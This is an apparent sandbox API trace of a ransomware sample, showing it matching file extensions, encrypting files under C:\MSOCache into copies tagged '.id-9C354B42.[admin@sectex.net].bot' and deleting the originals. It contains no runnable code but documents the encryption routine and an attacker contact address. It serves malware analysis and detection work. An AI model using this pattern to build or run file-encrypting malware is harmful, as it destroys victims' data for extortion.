	[0044.948] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0044.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73
	[0044.948] lstrlenW (lpString=".dbf") returned 4
	[0044.948] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0044.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73
	[0044.948] lstrlenW (lpString=".1cd") returned 4
	[0044.948] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0044.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73
	[0044.949] lstrlenW (lpString=".jpg") returned 4
	[0044.949] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0044.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73
	[0044.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73
	[0044.949] lstrlenW (lpString=".doc") returned 4
	[0044.949] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0044.949] lstrlenW (lpString=".docx") returned 5
	[0044.949] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0044.949] lstrlenW (lpString=".pdf") returned 4
	[0044.949] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0044.949] lstrlenW (lpString=".xls") returned 4
	[0044.949] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0044.949] lstrlenW (lpString=".xlsx") returned 5
	[0044.949] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0044.949] lstrlenW (lpString=".ppt") returned 4
	[0044.949] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0044.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73
	[0044.949] lstrlenW (lpString=".zip") returned 4
	[0044.949] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0044.949] lstrlenW (lpString=".rar") returned 4
	[0044.949] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0044.949] lstrlenW (lpString=".bz2") returned 4
	[0044.949] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0044.949] lstrlenW (lpString=".7z") returned 3
	[0044.949] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0044.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73
	[0044.949] lstrlenW (lpString=".dbf") returned 4
	[0044.949] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0044.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73
	[0044.949] lstrlenW (lpString=".1cd") returned 4
	[0044.949] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0044.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73
	[0044.949] lstrlenW (lpString=".jpg") returned 4
	[0044.950] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0044.950] lstrcmpiW (lpString1=".exe", lpString2=".bot") returned 1
	[0044.950] lstrlenW (lpString="dwtrig20.exe") returned 12
	[0044.950] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0045.013] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=519584) returned 1
	[0045.013] CloseHandle (hObject=0x1a0) returned 1
	[0045.013] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe")) returned 0x2020
	[0045.013] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.013] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0045.013] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.013] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.014] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0045.015] GetLastError () returned 0x0
	[0045.015] ReadFile (in: hFile=0x1a0, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x7eda0, lpOverlapped=0x0) returned 1
	[0045.470] WriteFile (in: hFile=0x194, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0x7edb0, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0x7edb0, lpOverlapped=0x0) returned 1
	[0045.479] ReadFile (in: hFile=0x1a0, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.479] WriteFile (in: hFile=0x194, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0045.479] SetEndOfFile (hFile=0x194) returned 1
	[0045.479] CloseHandle (hObject=0x194) returned 1
	[0045.479] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.479] SetEndOfFile (hFile=0x1a0) returned 1
	[0045.484] CloseHandle (hObject=0x1a0) returned 1
	[0045.484] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0045.484] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe")) returned 1
	[0045.484] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75
	[0045.484] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75
	[0045.484] lstrlenW (lpString=".doc") returned 4
	[0045.484] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0045.484] lstrlenW (lpString=".docx") returned 5
	[0045.485] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1
	[0045.485] lstrlenW (lpString=".pdf") returned 4
	[0045.485] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0045.485] lstrlenW (lpString=".xls") returned 4
	[0045.485] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0045.485] lstrlenW (lpString=".xlsx") returned 5
	[0045.485] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1
	[0045.485] lstrlenW (lpString=".ppt") returned 4
	[0045.485] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0045.485] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75
	[0045.485] lstrlenW (lpString=".zip") returned 4
	[0045.485] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0045.485] lstrlenW (lpString=".rar") returned 4
	[0045.485] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0045.485] lstrlenW (lpString=".bz2") returned 4
	[0045.485] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0045.485] lstrlenW (lpString=".7z") returned 3
	[0045.485] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0045.485] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75
	[0045.485] lstrlenW (lpString=".dbf") returned 4
	[0045.485] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0045.485] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75
	[0045.485] lstrlenW (lpString=".1cd") returned 4
	[0045.485] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0045.485] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75
	[0045.485] lstrlenW (lpString=".jpg") returned 4
	[0045.485] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0045.485] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75
	[0045.485] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75
	[0045.485] lstrlenW (lpString=".doc") returned 4
	[0045.485] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0045.485] lstrlenW (lpString=".docx") returned 5
	[0045.485] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1
	[0045.485] lstrlenW (lpString=".pdf") returned 4
	[0045.486] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0045.486] lstrlenW (lpString=".xls") returned 4
	[0045.486] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0045.486] lstrlenW (lpString=".xlsx") returned 5
	[0045.486] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1
	[0045.486] lstrlenW (lpString=".ppt") returned 4
	[0045.486] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0045.486] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75
	[0045.486] lstrlenW (lpString=".zip") returned 4
	[0045.486] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0045.486] lstrlenW (lpString=".rar") returned 4
	[0045.486] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0045.486] lstrlenW (lpString=".bz2") returned 4
	[0045.486] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0045.486] lstrlenW (lpString=".7z") returned 3
	[0045.486] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0045.486] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75
	[0045.486] lstrlenW (lpString=".dbf") returned 4
	[0045.486] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0045.486] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75
	[0045.486] lstrlenW (lpString=".1cd") returned 4
	[0045.486] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0045.486] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75
	[0045.486] lstrlenW (lpString=".jpg") returned 4
	[0045.486] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0045.486] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0045.486] lstrlenW (lpString="osetupui.dll") returned 12
	[0045.486] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0045.487] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=191872) returned 1
	[0045.487] CloseHandle (hObject=0x1a0) returned 1
	[0045.487] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll")) returned 0x2020
	[0045.487] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.487] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0045.487] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.487] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.487] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0045.488] GetLastError () returned 0x0
	[0045.488] ReadFile (in: hFile=0x1a0, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x2ed80, lpOverlapped=0x0) returned 1
	[0045.610] WriteFile (in: hFile=0x194, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0x2ed90, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0x2ed90, lpOverlapped=0x0) returned 1
	[0045.614] ReadFile (in: hFile=0x1a0, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.614] WriteFile (in: hFile=0x194, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0045.614] SetEndOfFile (hFile=0x194) returned 1
	[0045.614] CloseHandle (hObject=0x194) returned 1
	[0045.614] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.614] SetEndOfFile (hFile=0x1a0) returned 1
	[0045.616] CloseHandle (hObject=0x1a0) returned 1
	[0045.616] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0045.616] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll")) returned 1
	[0045.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75
	[0045.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75
	[0045.617] lstrlenW (lpString=".doc") returned 4
	[0045.617] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0045.617] lstrlenW (lpString=".docx") returned 5
	[0045.617] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1
	[0045.617] lstrlenW (lpString=".pdf") returned 4
	[0045.617] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0045.617] lstrlenW (lpString=".xls") returned 4
	[0045.617] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0045.617] lstrlenW (lpString=".xlsx") returned 5
	[0045.617] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1
	[0045.617] lstrlenW (lpString=".ppt") returned 4
	[0045.617] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0045.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75
	[0045.617] lstrlenW (lpString=".zip") returned 4
	[0045.617] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0045.617] lstrlenW (lpString=".rar") returned 4
	[0045.617] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0045.617] lstrlenW (lpString=".bz2") returned 4
	[0045.617] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0045.617] lstrlenW (lpString=".7z") returned 3
	[0045.617] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0045.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75
	[0045.617] lstrlenW (lpString=".dbf") returned 4
	[0045.617] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0045.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75
	[0045.617] lstrlenW (lpString=".1cd") returned 4
	[0045.617] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0045.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75
	[0045.617] lstrlenW (lpString=".jpg") returned 4
	[0045.618] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0045.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75
	[0045.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75
	[0045.618] lstrlenW (lpString=".doc") returned 4
	[0045.618] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0045.618] lstrlenW (lpString=".docx") returned 5
	[0045.618] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1
	[0045.618] lstrlenW (lpString=".pdf") returned 4
	[0045.618] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0045.618] lstrlenW (lpString=".xls") returned 4
	[0045.618] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0045.618] lstrlenW (lpString=".xlsx") returned 5
	[0045.618] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1
	[0045.618] lstrlenW (lpString=".ppt") returned 4
	[0045.618] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0045.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75
	[0045.618] lstrlenW (lpString=".zip") returned 4
	[0045.618] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0045.618] lstrlenW (lpString=".rar") returned 4
	[0045.618] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0045.618] lstrlenW (lpString=".bz2") returned 4
	[0045.618] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0045.618] lstrlenW (lpString=".7z") returned 3
	[0045.618] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0045.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75
	[0045.618] lstrlenW (lpString=".dbf") returned 4
	[0045.618] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0045.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75
	[0045.618] lstrlenW (lpString=".1cd") returned 4
	[0045.618] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0045.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75
	[0045.618] lstrlenW (lpString=".jpg") returned 4
	[0045.618] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0045.619] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0045.619] lstrlenW (lpString="AccessMUI.msi") returned 13
	[0045.619] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0046.167] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=2517504) returned 1
	[0046.167] CloseHandle (hObject=0x1a8) returned 1
	[0046.168] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi")) returned 0x2020
	[0046.168] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.168] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0046.168] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0046.168] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0046.168] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.168] ReadFile (in: hFile=0x1a8, lpBuffer=0xae90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xae90058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.196] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xcce00, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.197] ReadFile (in: hFile=0x1a8, lpBuffer=0xaed0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaed0058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.207] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0046.207] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x226a00, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.207] ReadFile (in: hFile=0x1a8, lpBuffer=0xaf10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaf10058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.228] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.228] WriteFile (in: hFile=0x1a8, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0xa2dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfcb0*=0xc0106, lpOverlapped=0x0) returned 1
	[0046.359] SetEndOfFile (hFile=0x1a8) returned 1
	[0046.367] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb50b818
	[0046.461] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
